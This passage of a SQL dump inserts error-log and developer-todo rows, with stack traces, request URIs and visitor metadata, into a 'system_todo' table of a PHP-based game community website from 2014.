'http://www.mojotrollz.eu/web/mojotrollz/sai.php?t=11_0000000000000000_5052001223002100_000000000000000', 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.71 Safari/537.36', 10, b'0', 0, 1, 1, 0, NULL); INSERT INTO `system_todo` (`ID`, `class`, `message`, `message_hash`, `code`, `file`, `line`, `trace`, `ip`, `querytime`, `time`, `server_name`, `server_port`, `request_uri`, `post`, `http_referer`, `http_user_agent`, `user`, `thrown`, `type`, `count`, `state`, `priority`, `time_closed`) VALUES (394, 'SYSTEM\\LOG\\WARNING', 'Array\n(\n [datei_skilltree_skills] => Array\n (\n [name] => inv_weapon_halbard_01.png\n [type] => image/png\n [tmp_name] => /tmp/php2vKtWA\n [error] => 0\n [size] => 4580\n )\n\n)\n', 'f10375ee72228a2d18c4cf74db125825be965974', 1, '/home/web/webdir/mojotrollz/system/sai/modules/saimod_sys_files/saimod_sys_files.php', 20, '#0 [internal function]: SYSTEM\\SAI\\saimod_sys_files::sai_mod__SYSTEM_SAI_saimod_sys_files_action_upload(\'skilltree_skill...\')\n#1 /home/web/webdir/mojotrollz/system/api/api.php(59): call_user_func_array(Array, Array)\n#2 /home/web/webdir/mojotrollz/system/sai/sai/saigui.php(22): SYSTEM\\API\\api::run(\'\\\\SYSTEM\\\\API\\\\ver...\', \'\\\\SYSTEM\\\\SAI\\\\sai...\', Array, 42, true, false)\n#3 /home/web/webdir/mojotrollz/sai.php(17): SYSTEM\\SAI\\saigui->html()\n#4 {main}', '37.24.148.240', 0.02, '2014-11-28 18:44:45', 'www.mojotrollz.eu', 80, '/web/mojotrollz/sai.php?sai_mod=.SYSTEM.SAI.saimod_sys_files&action=upload&cat=skilltree_skills', 'a:0:{}', 'http://www.mojotrollz.eu/web/mojotrollz/sai.php?t=11_0000000000000000_5052001223002100_000000000000000', 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.71 Safari/537.36', 10, b'0', 0, 1, 1, 0, NULL); INSERT INTO `system_todo` (`ID`, `class`, `message`, `message_hash`, `code`, `file`, `line`, `trace`, `ip`, `querytime`, `time`, `server_name`, `server_port`, `request_uri`, `post`, `http_referer`, `http_user_agent`, `user`, `thrown`, `type`, `count`, `state`, `priority`, `time_closed`) VALUES (395, 'SYSTEM\\LOG\\ERROR', 'Class not found: wizard_start', '212ce220034416144323aa2dd0c8d349b91cb9f4', 1, '/home/mojotrolls/mojo_zero/src/web/system/system/autoload.php', 64, '#0 [internal function]: SYSTEM\\autoload::autoload(\'wizard_start\')\n#1 [internal function]: spl_autoload_call(\'wizard_start\')\n#2 /home/mojotrolls/mojo_zero/src/web/system/page/State.php(11): class_exists(\'wizard_start\')\n#3 /home/mojotrolls/mojo_zero/src/web/system/api/api_system.php(16): SYSTEM\\PAGE\\State::get(\'1\')\n#4 [internal function]: SYSTEM\\API\\api_system::call_pages(\'1\')\n#5 /home/mojotrolls/mojo_zero/src/web/system/api/api.php(59): call_user_func_array(Array, Array)\n#6 /home/mojotrolls/mojo_zero/src/web/api.php(19): SYSTEM\\API\\api::run(\'\\\\SYSTEM\\\\API\\\\ver...\', \'api_mojotrollz\', Array)\n#7 {main}', '199.30.228.134', 0.088, '2014-11-29 14:11:19', 'mojotrollz.eu', 80, '/api.php?call=pages&group=1', 'a:0:{}', 'http://mojotrollz.eu/', 'Mozilla/5.0 (X11; Linux i686) AppleWebKit/534.34 (KHTML, like Gecko) Qt/4.8.4 Safari/534.34', 0, b'0', 0, 4, 1, 0, NULL); INSERT INTO `system_todo` (`ID`, `class`, `message`, `message_hash`, `code`, `file`, `line`, `trace`, `ip`, `querytime`, `time`, `server_name`, `server_port`, `request_uri`, `post`, `http_referer`, `http_user_agent`, `user`, `thrown`, `type`, `count`, `state`, `priority`, `time_closed`) VALUES (403, 'SYSTEM\\LOG\\ERROR', 'Unhandled or misshandled parameters - api query is invalid; given: 4; statics: 0; req_command: 1; req_param: 1; opt_param: 1; url: /api.php?call=files&cat=sys&id=system.js&_=1415232000000', '1f95710d48f49a2edceebae1b9f9e2ff3af3a80a', 1, '/home/mojotrolls/mojo_zero/src/web/system/api/api.php', 107, '#0 /home/mojotrolls/mojo_zero/src/web/system/api/api.php(46): SYSTEM\\API\\api::do_strict(true, Array, Array, Array, Array, Array)\n#1 /home/mojotrolls/mojo_zero/src/web/api.php(19): SYSTEM\\API\\api::run(\'\\\\SYSTEM\\\\API\\\\ver...\', \'api_mojotrollz\', Array)\n#2 {main}', '66.249.78.154', 0.048, '2014-11-30 03:07:56', 'www.mojotrollz.eu', 80, '/api.php?call=files&cat=sys&id=system.js&_=1415232000000', 'a:0:{}', 'http://www.mojotrollz.eu/index.php?p=server&sub=chars&page=17', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)', 0, b'0', 0, 1, 1, 0, NULL); INSERT INTO `system_todo` (`ID`, `class`, `message`, `message_hash`, `code`, `file`, `line`, `trace`, `ip`, `querytime`, `time`, `server_name`, `server_port`, `request_uri`, `post`, `http_referer`, `http_user_agent`, `user`, `thrown`, `type`, `count`, `state`, `priority`, `time_closed`) VALUES (397, 'Exception', 'Testtest2test3', 'c4ad7d975f8c621ea0f7a2cf881e04a12f1d2268', 0, '/home/web/webdir/mojotrollz/system/sai/modules/saimod_sys_todo/saimod_sys_todo.php', 13, '#0 [internal function]: SYSTEM\\SAI\\saimod_sys_todo::sai_mod__SYSTEM_SAI_saimod_sys_todo_action_add(\'Testtest2test3\')\n#1 /home/web/webdir/mojotrollz/system/api/api.php(59): call_user_func_array(Array, Array)\n#2 /home/web/webdir/mojotrollz/system/sai/sai/saigui.php(22): SYSTEM\\API\\api::run(\'\\\\SYSTEM\\\\API\\\\ver...\', \'\\\\SYSTEM\\\\SAI\\\\sai...\', Array, 42, true, false)\n#3 /home/web/webdir/mojotrollz/sai.php(17): SYSTEM\\SAI\\saigui->html()\n#4 {main}', '37.24.148.240', 0.016, '2014-11-29 15:21:06', 'www.mojotrollz.eu', 80, '/web/mojotrollz/sai.php?sai_mod=.SYSTEM.SAI.saimod_sys_todo&action=add&todo=Testtest2test3', 'a:0:{}', 'http://www.mojotrollz.eu/web/mojotrollz/sai.php', 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.71 Safari/537.36', 10, b'0', 1, 1, 1, 0, NULL); INSERT INTO `system_todo` (`ID`, `class`, `message`, `message_hash`, `code`, `file`, `line`, `trace`, `ip`, `querytime`, `time`, `server_name`, `server_port`, `request_uri`, `post`, `http_referer`, `http_user_agent`, `user`, `thrown`, `type`, `count`, `state`, `priority`, `time_closed`) VALUES (398, 'SYSTEM\\LOG\\ERROR', 'API call is not implemented in API: sai_mod__system_sai_saimod_sys_todo_action_close_all', '3f0b3dbc05b35b34db1189c37cbb53e3447fefd6', 1, '/home/web/webdir/mojotrollz/system/api/api.php', 101, '#0 /home/web/webdir/mojotrollz/system/api/api.php(56): SYSTEM\\API\\api::do_default(false, \'\\\\SYSTEM\\\\SAI\\\\sai...\', \'sai_mod__system...\')\n#1 /home/web/webdir/mojotrollz/system/sai/sai/saigui.php(22): SYSTEM\\API\\api::run(\'\\\\SYSTEM\\\\API\\\\ver...\', \'\\\\SYSTEM\\\\SAI\\\\sai...\', Array, 42, true, false)\n#2 /home/web/webdir/mojotrollz/sai.php(17): SYSTEM\\SAI\\saigui->html()\n#3 {main}', '37.24.148.240', 0.016, '2014-11-29 15:35:30', 'www.mojotrollz.eu', 80, '/web/mojotrollz/sai.php?sai_mod=.SYSTEM.SAI.saimod_sys_todo&action=close_all', 'a:0:{}', 'http://www.mojotrollz.eu/web/mojotrollz/sai.php', 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.71 Safari/537.36', 10, b'0', 0, 1, 1, 0, NULL); INSERT INTO `system_todo` (`ID`, `class`, `message`, `message_hash`, `code`, `file`, `line`, `trace`, `ip`, `querytime`, `time`, `server_name`, `server_port`, `request_uri`, `post`, `http_referer`, `http_user_agent`, `user`, `thrown`, `type`, `count`, `state`, `priority`, `time_closed`) VALUES (417, 'SYSTEM\\LOG\\ERROR', 'No matching ID \'button.png\' found.', '745323106d9f7f66a0c9b560cd0f631abc6836b7', 1, '/home/web/webdir/mojotrollz/system/files/files.php', 22, '#0 /home/web/webdir/mojotrollz/system/api/api_system.php(13): SYSTEM\\FILES\\files::get(\'default_page\', \'button.png\', true)\n#1 [internal function]: SYSTEM\\API\\api_system::call_files(\'default_page\', \'button.png\')\n#2 /home/web/webdir/mojotrollz/system/api/api.php(59): call_user_func_array(Array, Array)\n#3 /home/web/webdir/mojotrollz/api.php(19): SYSTEM\\API\\api::run(\'\\\\SYSTEM\\\\API\\\\ver...\', \'api_mojotrollz\', Array)\n#4 {main}', '66.249.78.162', 0.012, '2014-12-06 18:25:37', 'www.mojotrollz.eu', 80, '/web/mojotrollz/api.php?call=files&cat=default_page&id=button.png', 'a:0:{}', '', 'Googlebot-Image/1.0', 0, b'0', 0, 1, 1, 0, NULL); INSERT INTO `system_todo` (`ID`, `class`, `message`, `message_hash`, `code`, `file`, `line`, `trace`, `ip`, `querytime`, `time`, `server_name`, `server_port`, `request_uri`, `post`, `http_referer`, `http_user_agent`, `user`, `thrown`, `type`, `count`, `state`, `priority`, `time_closed`) VALUES (400, 'Exception', 'Security -> last login wrong here', 'fd2ace637cbc8e5f79f3eee21565658abacac19c', 0, '/home/web/webdir/mojotrollz/system/sai/modules/saimod_sys_todo/saimod_sys_todo.php', 13, '#0 [internal function]: SYSTEM\\SAI\\saimod_sys_todo::sai_mod__SYSTEM_SAI_saimod_sys_todo_action_add(\'Security -> las...\')\n#1 /home/web/webdir/mojotrollz/system/api/api.php(59): call_user_func_array(Array, Array)\n#2 /home/web/webdir/mojotrollz/system/sai/sai/saigui.php(22): SYSTEM\\API\\api::run(\'\\\\SYSTEM\\\\API\\\\ver...\', \'\\\\SYSTEM\\\\SAI\\\\sai...\', Array, 42, true, false)\n#3 /home/web/webdir/mojotrollz/sai.php(17): SYSTEM\\SAI\\saigui->html()\n#4 {main}', '37.24.148.240', 0.012, '2014-11-29 16:45:19', 'www.mojotrollz.eu', 80, '/web/mojotrollz/sai.php?sai_mod=.SYSTEM.SAI.saimod_sys_todo&action=add&todo=Security%20-%3E%20last%20login%20wrong%20here', 'a:0:{}', 'http://www.mojotrollz.eu/web/mojotrollz/sai.php', 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.71 Safari/537.36', 10, b'0', 1, 1, 1, 0, NULL); INSERT INTO `system_todo` (`ID`, `class`, `message`, `message_hash`, `code`, `file`, `line`, `trace`, `ip`, `querytime`, `time`, `server_name`, `server_port`, `request_uri`, `post`, `http_referer`, `http_user_agent`, `user`, `thrown`, `type`, `count`, `state`, `priority`, `time_closed`) VALUES (399, 'Exception', 'Todo -> Edit, view custom better', '534bd2c9c38f31504e7dd42058be71def2446073', 0, '/home/web/webdir/mojotrollz/system/sai/modules/saimod_sys_todo/saimod_sys_todo.php', 13, '#0 [internal function]: SYSTEM\\SAI\\saimod_sys_todo::sai_mod__SYSTEM_SAI_saimod_sys_todo_action_add(\'Todo -> Edit, v...\')\n#1 /home/web/webdir/mojotrollz/system/api/api.php(59): call_user_func_array(Array, Array)\n#2 /home/web/webdir/mojotrollz/system/sai/sai/saigui.php(22): SYSTEM\\API\\api::run(\'\\\\SYSTEM\\\\API\\\\ver...\', \'\\\\SYSTEM\\\\SAI\\\\sai...\', Array, 42, true, false)\n#3 /home/web/webdir/mojotrollz/sai.php(17): SYSTEM\\SAI\\saigui->html()\n#4 {main}', '37.24.148.240', 0.012, '2014-11-29 15:46:28', 'www.mojotrollz.eu', 80, '/web/mojotrollz/sai.php?sai_mod=.SYSTEM.SAI.saimod_sys_todo&action=add&todo=Todo%20-%3E%20Edit,%20view%20custom%20better', 'a:0:{}', 'http://www.mojotrollz.eu/web/mojotrollz/sai.php', 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.71 Safari/537.36', 10, b'0', 1, 1, 1, 0, NULL); INSERT INTO `system_todo` (`ID`, `class`, `message`, `message_hash`, `code`, `file`, `line`, `trace`, `ip`, `querytime`, `time`, `server_name`, `server_port`, `request_uri`, `post`, `http_referer`, `http_user_agent`, `user`, `thrown`, `type`, `count`, `state`, `priority`, `time_closed`) VALUES (537, 'SYSTEM\\LOG\\ERROR', 'No matching ID \'ability_warrior_riposte.png\' found.', '7665134667c50c21ab541c4cddb96036693f378f', 1, '/home/web/webdir/mojotrollz/system/files/files.php', 22, '#0 /home/web/webdir/mojotrollz/system/api/api_system.php(13): SYSTEM\\FILES\\files::get(\'skilltree_skill...\', \'ability_warrior...\', true)\n#1 [internal function]: SYSTEM\\API\\api_system::call_files(\'skilltree_skill...\', \'ability_warrior...\')\n#2 /home/web/webdir/mojotrollz/system/api/api.php(59): call_user_func_array(Array, Array)\n#3 /home/web/webdir/mojotrollz/api.php(19): SYSTEM\\API\\api::run(\'\\\\SYSTEM\\\\API\\\\ver...\', \'api_mojotrollz\', Array)\n#4 {main}', '37.24.148.242', 0.012, '2014-12-14 03:37:20', 'www.mojotrollz.eu', 80, '/web/mojotrollz/api.php?call=files&cat=skilltree_skills&id=ability_warrior_riposte.png', 'a:0:{}', 'http://www.mojotrollz.eu/web/mojotrollz/sai.php?t=1_050253210500150231_05050005001000000_00000000000000000', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:33.0) Gecko/20100101 Firefox/33.0', 13, b'0', 0, 132, 1, 0, NULL); INSERT INTO `system_todo` (`ID`, `class`, `message`, `message_hash`, `code`, `file`, `line`, `trace`, `ip`, `querytime`, `time`, `server_name`, `server_port`, `request_uri`, `post`, `http_referer`, `http_user_agent`, `user`, `thrown`, `type`, `count`, `state`, `priority`, `time_closed`) VALUES (401, 'Exception', 'Item linkable, tooltip, icons', '48205ee8d302261569a45c033dfcba5a33f0550d', 0, '/home/web/webdir/mojotrollz/system/sai/modules/saimod_sys_todo/saimod_sys_todo.php', 13, '#0 [internal function]: SYSTEM\\SAI\\saimod_sys_todo::sai_mod__SYSTEM_SAI_saimod_sys_todo_action_add(\'Item linkable, ...\')\n#1 /home/web/webdir/mojotrollz/system/api/api.php(59): call_user_func_array(Array, Array)\n#2 /home/web/webdir/mojotrollz/system/sai/sai/saigui.php(22): SYSTEM\\API\\api::run(\'\\\\SYSTEM\\\\API\\\\ver...\', \'\\\\SYSTEM\\\\SAI\\\\sai...\', Array, 42, true, false)\n#3 /home/web/webdir/mojotrollz/sai.php(17): SYSTEM\\SAI\\saigui->html()\n#4 {main}', '37.24.148.240', 0.012, '2014-11-29 16:46:30', 'www.mojotrollz.eu', 80, '/web/mojotrollz/sai.php?sai_mod=.SYSTEM.SAI.saimod_sys_todo&action=add&todo=Item%20linkable,%20tooltip,%20icons', 'a:0:{}', 'http://www.mojotrollz.eu/web/mojotrollz/sai.php', 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.71 Safari/537.36', 10, b'0', 1, 1, 0, 0, NULL); INSERT INTO `system_todo` (`ID`, `class`, `message`, `message_hash`, `code`, `file`, `line`, `trace`, `ip`, `querytime`, `time`, `server_name`, `server_port`, `request_uri`, `post`, `http_referer`, `http_user_agent`, `user`, `thrown`, `type`, `count`, `state`, `priority`, `time_closed`) VALUES (402, 'Exception', 'Spell linkable, tooltip, icons (dbc?!)', 'd9898aa80d1c9987c7b6630983568963e7453d3c', 0, '/home/web/webdir/mojotrollz/system/sai/modules/saimod_sys_todo/saimod_sys_todo.php', 13, '#0 [internal function]: SYSTEM\\SAI\\saimod_sys_todo::sai_mod__SYSTEM_SAI_saimod_sys_todo_action_add(\'Spell linkable,...\')\n#1 /home/web/webdir/mojotrollz/system/api/api.php(59): call_user_func_array(Array, Array)\n#2 /home/web/webdir/mojotrollz/system/sai/sai/saigui.php(22): SYSTEM\\API\\api::run(\'\\\\SYSTEM\\\\API\\\\ver...\', \'\\\\SYSTEM\\\\SAI\\\\sai...\', Array, 42, true, false)\n#3 /home/web/webdir/mojotrollz/sai.php(17): SYSTEM\\SAI\\saigui->html()\n#4 {main}', '37.24.148.240', 0.016, '2014-11-29 16:46:42', 'www.mojotrollz.eu', 80, '/web/mojotrollz/sai.php?sai_mod=.SYSTEM.SAI.saimod_sys_todo&action=add&todo=Spell%20linkable,%20tooltip,%20icons%20(dbc?!)', 'a:0:{}', 'http://www.mojotrollz.eu/web/mojotrollz/sai.php', 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.71 Safari/537.36', 10, b'0', 1, 1, 0, 0, NULL); INSERT INTO `system_todo` (`ID`, `class`, `message`, `message_hash`, `code`, `file`, `line`, `trace`, `ip`, `querytime`, `time`, `server_name`, `server_port`, `request_uri`, `post`, `http_referer`, `http_user_agent`, `user`, `thrown`, `type`, `count`, `state`, `priority`, `time_closed`) VALUES (404, 'ERROR', 'You need to be logged in to view this ressource.', 'ce1bcbc4e2e244f775aa9a8fc9de471d0b058843', 1, '/home/web/webdir/mojotrollz/mojotrollz/page/page_mojotrollz.php', 39, '#0 [internal function]: page_mojotrollz::page_user_start()\n#1 /home/web/webdir/mojotrollz/system/api/api.php(59): call_user_func_array(Array, Array)\n#2 /home/web/webdir/mojotrollz/index.php(12): SYSTEM\\API\\api::run(\'\\\\SYSTEM\\\\API\\\\ver...\', \'page_mojotrollz\', Array, 1, false, true)\n#3 {main}', '93.204.81.49', 0.024, '2014-12-22 21:38:07', 'mojotrollz.eu', 80, '/web/mojotrollz/?page=user_start&', 'a:0:{}', 'http://mojotrollz.eu/web/mojotrollz/', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:33.0) Gecko/20100101 Firefox/33.0', 0, b'0', 0, 4, 1, 0, NULL); INSERT INTO `system_todo` (`ID`, `class`, `message`, `message_hash`, `code`, `file`, `line`, `trace`, `ip`, `querytime`, `time`, `server_name`, `server_port`, `request_uri`, `post`, `http_referer`, `http_user_agent`, `user`, `thrown`, `type`, `count`, `state`, `priority`, `time_closed`) VALUES (405, 'SYSTEM\\LOG\\ERROR', 'Unhandled or misshandled parameters - api query is invalid; given: 4; statics: 0; req_command: 1; req_param: 1; opt_param: 1; url: /web/mojotrollz/api.php?call=files&cat=sys&id=system.js&_=1417528134461', '4c07366249587dd66e4959c215ab485e2a972975', 1, '/home/web/webdir/mojotrollz/system/api/api.php', 107, '#0 /home/web/webdir/mojotrollz/system/api/api.php(46): SYSTEM\\API\\api::do_strict(true, Array, Array, Array, Array, Array)\n#1 /home/web/webdir/mojotrollz/api.php(19): SYSTEM\\API\\api::run(\'\\\\SYSTEM\\\\API\\\\ver...\', \'api_mojotrollz\', Array)\n#2 {main}', '93.204.81.49', 0.004, '2014-12-02 14:49:03', 'mojotrollz.eu', 80, '/web/mojotrollz/api.php?call=files&cat=sys&id=system.js&_=1417528134461', 'a:0:{}', 'http://mojotrollz.eu/web/mojotrollz/', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:33.0) Gecko/20100101 Firefox/33.0', 11, b'0', 0, 1, 1, 0, NULL); INSERT INTO `system_todo` (`ID`, `class`, `message`, `message_hash`, `code`, `file`, `line`, `trace`, `ip`, `querytime`, `time`, `server_name`, `server_port`, `request_uri`, `post`, `http_referer`, `http_user_agent`, `user`, `thrown`, `type`, `count`, `state`, `priority`, `time_closed`) VALUES (406, 'SYSTEM\\LOG\\ERROR', 'Unhandled or misshandled parameters - api query is invalid; given: 4; statics: 0; req_command: 1; req_param: 1; opt_param: 1; url: /web/mojotrollz/api.php?call=files&cat=sys&id=system.js&_=1417528140022', 'adaae83ac1084aba29298a3268f7e7fc6be756c7', 1, '/home/web/webdir/mojotrollz/system/api/api.php', 107, '#0 /home/web/webdir/mojotrollz/system/api/api.php(46): SYSTEM\\API\\api::do_strict(true, Array, Array, Array, Array, Array)\n#1 /home/web/webdir/mojotrollz/api.php(19): SYSTEM\\API\\api::run(\'\\\\SYSTEM\\\\API\\\\ver...\', \'api_mojotrollz\', Array)\n#2 {main}', '93.204.81.49', 0.004, '2014-12-02 14:49:15', 'mojotrollz.eu', 80, '/web/mojotrollz/api.php?call=files&cat=sys&id=system.js&_=1417528140022', 'a:0:{}', 'http://mojotrollz.eu/web/mojotrollz/', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:33.0) Gecko/20100101 Firefox/33.0', 11, b'0', 0, 1, 1, 0, NULL); INSERT INTO `system_todo` (`ID`, `class`, `message`, `message_hash`, `code`, `file`, `line`, `trace`, `ip`, `querytime`, `time`, `server_name`, `server_port`, `request_uri`, `post`, `http_referer`, `http_user_agent`, `user`, `thrown`, `type`, `count`, `state`, `priority`, `time_closed`) VALUES (407, 'SYSTEM\\LOG\\ERROR', 'Unhandled or misshandled parameters - api query is invalid; given: 4; statics: 0; req_command: 1; req_param: 1; opt_param: 1; url: /web/mojotrollz/api.php?call=files&cat=sys&id=system.js&_=1417528152167', 'aa8f768d7a8b7576c82320a74ea8d77c88b52cfc', 1, '/home/web/webdir/mojotrollz/system/api/api.php', 107, '#0 /home/web/webdir/mojotrollz/system/api/api.php(46): SYSTEM\\API\\api::do_strict(true, Array, Array, Array, Array, Array)\n#1 /home/web/webdir/mojotrollz/api.php(19): SYSTEM\\API\\api::run(\'\\\\SYSTEM\\\\API\\\\ver...\', \'api_mojotrollz\', Array)\n#2 {main}', '93.204.81.49', 0.016, '2014-12-02 14:49:18', 'mojotrollz.eu', 80, '/web/mojotrollz/api.php?call=files&cat=sys&id=system.js&_=1417528152167', 'a:0:{}', 'http://mojotrollz.eu/web/mojotrollz/', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:33.0) Gecko/20100101 Firefox/33.0', 11, b'0', 0, 1, 1, 0, NULL); INSERT INTO `system_todo` (`ID`, `class`, `message`, `message_hash`, `code`, `file`, `line`, `trace`, `ip`, `querytime`, `time`, `server_name`, `server_port`, `request_uri`, `post`, `http_referer`, `http_user_agent`, `user`, `thrown`, `type`, `count`, `state`, `priority`, `time_closed`) VALUES (408, 'SYSTEM\\LOG\\ERROR', 'Unhandled or misshandled parameters - api query is invalid; given: 4; statics: 0; req_command: 1; req_param: 1; opt_param: 1; url: /web/mojotrollz/api.php?call=files&cat=sys&id=system.js&_=1417528288145', 'c1ba6f503323e92aefd4723ccb9918cad7c924e9', 1, '/home/web/webdir/mojotrollz/system/api/api.php', 107, '#0 /home/web/webdir/mojotrollz/system/api/api.php(46): SYSTEM\\API\\api::do_strict(true, Array, Array, Array, Array, Array)\n#1 /home/web/webdir/mojotrollz/api.php(19): SYSTEM\\API\\api::run(\'\\\\SYSTEM\\\\API\\\\ver...\', \'api_mojotrollz\', Array)\n#2 {main}', '93.204.81.49', 0.004, '2014-12-02 14:51:37', 'mojotrollz.eu', 80, '/web/mojotrollz/api.php?call=files&cat=sys&id=system.js&_=1417528288145', 'a:0:{}', 'http://mojotrollz.eu/web/mojotrollz/', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:33.0) Gecko/20100101 Firefox/33.0', 11, b'0', 0, 1, 1, 0, NULL); INSERT INTO `system_todo` (`ID`, `class`, `message`, `message_hash`, `code`, `file`, `line`, `trace`, `ip`, `querytime`, `time`, `server_name`, `server_port`, `request_uri`, `post`, `http_referer`, `http_user_agent`, `user`, `thrown`, `type`, `count`, `state`, `priority`, `time_closed`) VALUES (409, 'SYSTEM\\LOG\\ERROR', 'Unhandled or misshandled parameters - api query is invalid; given: 4; statics: 0; req_command: 1; req_param: 1; opt_param: 1; url: /web/mojotrollz/api.php?call=files&cat=sys&id=system.js&_=1417528385764', 'f761a8e24c59f69d59ed513b8543e31fd1f3eadf', 1, '/home/web/webdir/mojotrollz/system/api/api.php', 107, '#0 /home/web/webdir/mojotrollz/system/api/api.php(46): SYSTEM\\API\\api::do_strict(true, Array, Array, Array, Array, Array)\n#1 /home/web/webdir/mojotrollz/api.php(19): SYSTEM\\API\\api::run(\'\\\\SYSTEM\\\\API\\\\ver...\', \'api_mojotrollz\', Array)\n#2 {main}', '93.204.81.49', 0.004, '2014-12-02 14:53:14', 'mojotrollz.eu', 80, '/web/mojotrollz/api.php?call=files&cat=sys&id=system.js&_=1417528385764', 'a:0:{}', 'http://mojotrollz.eu/web/mojotrollz/', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:33.0) Gecko/20100101 Firefox/33.0', 11, b'0', 0, 1, 1, 0, NULL); INSERT INTO `system_todo` (`ID`, `class`, `message`, `message_hash`, `code`, `file`, `line`, `trace`, `ip`, `querytime`, `time`, `server_name`, `server_port`, `request_uri`, `post`, `http_referer`, `http_user_agent`, `user`, `thrown`, `type`, `count`, `state`, `priority`, `time_closed`) VALUES (410, 'SYSTEM\\LOG\\ERROR', 'Unhandled or misshandled parameters - api query is invalid; given: 4; statics: 0; req_command: 1; req_param: 1; opt_param: 1; url: /web/mojotrollz/api.php?call=files&cat=sys&id=system.js&_=1417528475642', 'ed258bbe85e10f45077e68e59cca5ee502ecb175', 1, '/home/web/webdir/mojotrollz/system/api/api.php', 107, '#0 /home/web/webdir/mojotrollz/system/api/api.php(46): SYSTEM\\API\\api::do_strict(true, Array, Array, Array, Array, Array)\n#1 /home/web/webdir/mojotrollz/api.php(19): SYSTEM\\API\\api::run(\'\\\\SYSTEM\\\\API\\\\ver...\', \'api_mojotrollz\', Array)\n#2 {main}', '93.204.81.49', 0.008, '2014-12-02 14:54:51', 'mojotrollz.eu', 80, '/web/mojotrollz/api.php?call=files&cat=sys&id=system.js&_=1417528475642', 'a:0:{}', 'http://mojotrollz.eu/web/mojotrollz/', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:33.0) Gecko/20100101 Firefox/33.0', 11, b'0', 0, 1, 1, 0, NULL); INSERT INTO `system_todo` (`ID`, `class`, `message`, `message_hash`, `code`, `file`, `line`, `trace`, `ip`, `querytime`, `time`, `server_name`, `server_port`, `request_uri`, `post`, `http_referer`, `http_user_agent`, `user`, `thrown`, `type`, `count`, `state`, `priority`, `time_closed`) VALUES (411, 'SYSTEM\\LOG\\ERROR', 'Unhandled or misshandled parameters - api query is invalid; given: 4; statics: 0; req_command: 1; req_param: 1; opt_param: 1; url: /web/mojotrollz/api.php?call=files&cat=sys&id=system.js&_=1417528706702', '4f9da7a58de880569f5ad76ab7b10c4b9a0e3eb0', 1, '/home/web/webdir/mojotrollz/system/api/api.php', 107, '#0 /home/web/webdir/mojotrollz/system/api/api.php(46): SYSTEM\\API\\api::do_strict(true, Array, Array, Array, Array, Array)\n#1 /home/web/webdir/mojotrollz/api.php(19): SYSTEM\\API\\api::run(\'\\\\SYSTEM\\\\API\\\\ver...\', \'api_mojotrollz\', Array)\n#2 {main}', '93.204.81.49', 0.004, '2014-12-02 14:58:35', 'mojotrollz.eu', 80, '/web/mojotrollz/api.php?call=files&cat=sys&id=system.js&_=1417528706702', 'a:0:{}', 'http://mojotrollz.eu/web/mojotrollz/', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:33.0) Gecko/20100101 Firefox/33.0', 11, b'0', 0, 1, 1, 0, NULL); INSERT INTO `system_todo` (`ID`, `class`, `message`, `message_hash`, `code`, `file`, `line`, `trace`, `ip`, `querytime`, `time`, `server_name`, `server_port`, `request_uri`, `post`, `http_referer`, `http_user_agent`, `user`, `thrown`, `type`, `count`, `state`, `priority`, `time_closed`) VALUES (412, 'SYSTEM\\LOG\\ERROR', 'Unhandled or misshandled parameters - api query is invalid; given: 4; statics: 0; req_command: 1; req_param: 1; opt_param: 1; url: /web/mojotrollz/api.php?call=files&cat=sys&id=system.js&_=1417528711521', 'bfb0ffd33b207d3a1e1b243b31a8b95769cedd04', 1, '/home/web/webdir/mojotrollz/system/api/api.php', 107, '#0 /home/web/webdir/mojotrollz/system/api/api.php(46): SYSTEM\\API\\api::do_strict(true, Array, Array, Array, Array, Array)\n#1 /home/web/webdir/mojotrollz/api.php(19): SYSTEM\\API\\api::run(\'\\\\SYSTEM\\\\API\\\\ver...\', \'api_mojotrollz\', Array)\n#2 {main}', '93.204.81.49', 0.012, '2014-12-02 14:58:37', 'mojotrollz.eu', 80, '/web/mojotrollz/api.php?call=files&cat=sys&id=system.js&_=1417528711521', 'a:0:{}', 'http://mojotrollz.eu/web/mojotrollz/', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:33.0) Gecko/20100101 Firefox/33.0', 11, b'0', 0, 1, 1, 0, NULL); INSERT INTO `system_todo` (`ID`, `class`, `message`, `message_hash`, `code`, `file`, `line`, `trace`, `ip`, `querytime`, `time`, `server_name`, `server_port`, `request_uri`, `post`, `http_referer`, `http_user_agent`, `user`, `thrown`, `type`, `count`, `state`, `priority`, `time_closed`) VALUES (413, 'SYSTEM\\LOG\\ERROR', 'Unhandled or misshandled parameters - api query is invalid; given: 4; statics: 0; req_command: 1; req_param: 1; opt_param: 1; url: /web/mojotrollz/api.php?call=files&cat=sys&id=system.js&_=1417528713379', 'b9a1eda788264b26b8772ff92d8c69f76eafa3c9', 1, '/home/web/webdir/mojotrollz/system/api/api.php', 107, '#0 /home/web/webdir/mojotrollz/system/api/api.php(46): SYSTEM\\API\\api::do_strict(true, Array, Array, Array, Array, Array)\n#1 /home/web/webdir/mojotrollz/api.php(19): SYSTEM\\API\\api::run(\'\\\\SYSTEM\\\\API\\\\ver...\', 